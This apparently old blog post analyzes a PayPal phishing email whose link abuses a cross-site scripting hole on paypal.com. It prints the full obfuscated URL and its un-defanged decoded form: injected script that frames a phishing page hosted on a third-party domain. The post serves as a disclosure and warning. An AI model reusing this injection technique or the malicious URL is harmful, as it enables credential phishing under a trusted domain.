JaBbA's Hut

A Paypal phish came into my filters today that had an insteresting technique. It's hard to display it, but when I hovered over the link in FireFox, I noticed 2 things:

- the link was actually pointing to https://www.paypal.com
- There was some Javascript at the end, which I couldn't see completely because the URL was so long.

The URL is obfuscated in the source:

https://www.paypal.com/us/cgi bin/webscr?cmd=_help ext&userID=657SDF34861DEG35S79G54WE3R5QW&userAcctType=paypal SD4F3D3S6VIE3XV15N4S4DLI75EW61E7BI23O&source_page=
%22%3E%3C%53crip%54%20defer%3Efunction%20writeDoc%28%29%7Bn%3Dthis.document%3Bn.
write%28%27%3CTITLE%3EPaypal%3C%2FTITLE%3E%3Cframeset%20rows%3D100%2525%3E%3C
frame%20src%3D%5C%27h%54%54ps%3A%2F%2Fvejledernet.ungevejledningen.dk%2Fraadgivere%2
F_temp%2Fwin32%2Fclass1%2Findex2.htm%5C%27%3E%3C%2Fframeset%3E%27%29%3Bn.close
%28%29%3B%7DsetTimeout%28%27writeDoc%28%29%3B%27%2C1%29%3B%3C%2F%53
crip%54%3E%3C&userStatus=F%29*HG %23%24H%29F_D*%23 %26%24IF* SH%28%29%23JFDS*
O%26OT* H%29%28*SFDH%29H LIDT*Y%23%24%25%29

so just looking at it won't tip you off. (Although threatening you with the USA PATRIOT ACT is what tipped me off). I wrote a quick perl translator and came up with (CAUTION: NOT DEFANGED):

https://www.paypal.com/us/cgi bin/webscr?cmd=_help
ext&userID=657SDF34861DEG35S79G54WE3R5QW&userAcctType=paypal
SD4F3D3S6VIE3XV15N4S4DLI75EW61E7BI23O&source_page="><ScripT defer>function
writeDoc(){n=this.document;n.write('<TITLE>Paypal</TITLE><frameset
rows=100%25><frame
src=\'hTTps://vejledernet.ungevejledningen.dk/raadgivere/_temp/win32/class1/index2.htm\'>
</frameset>');n.close();}setTimeout('writeDoc();',1);</ScripT><&userStatus=F)*HG
#$H)F_D*# &$IF* SH()#JFDS* O&OT* H)(*SFDH)H LIDT*Y#$%)

The referred PayPal cgi program has been removed so you get a 404, but sure enough, it tries to open a popup to vejledernet.ungevejledningen.dk.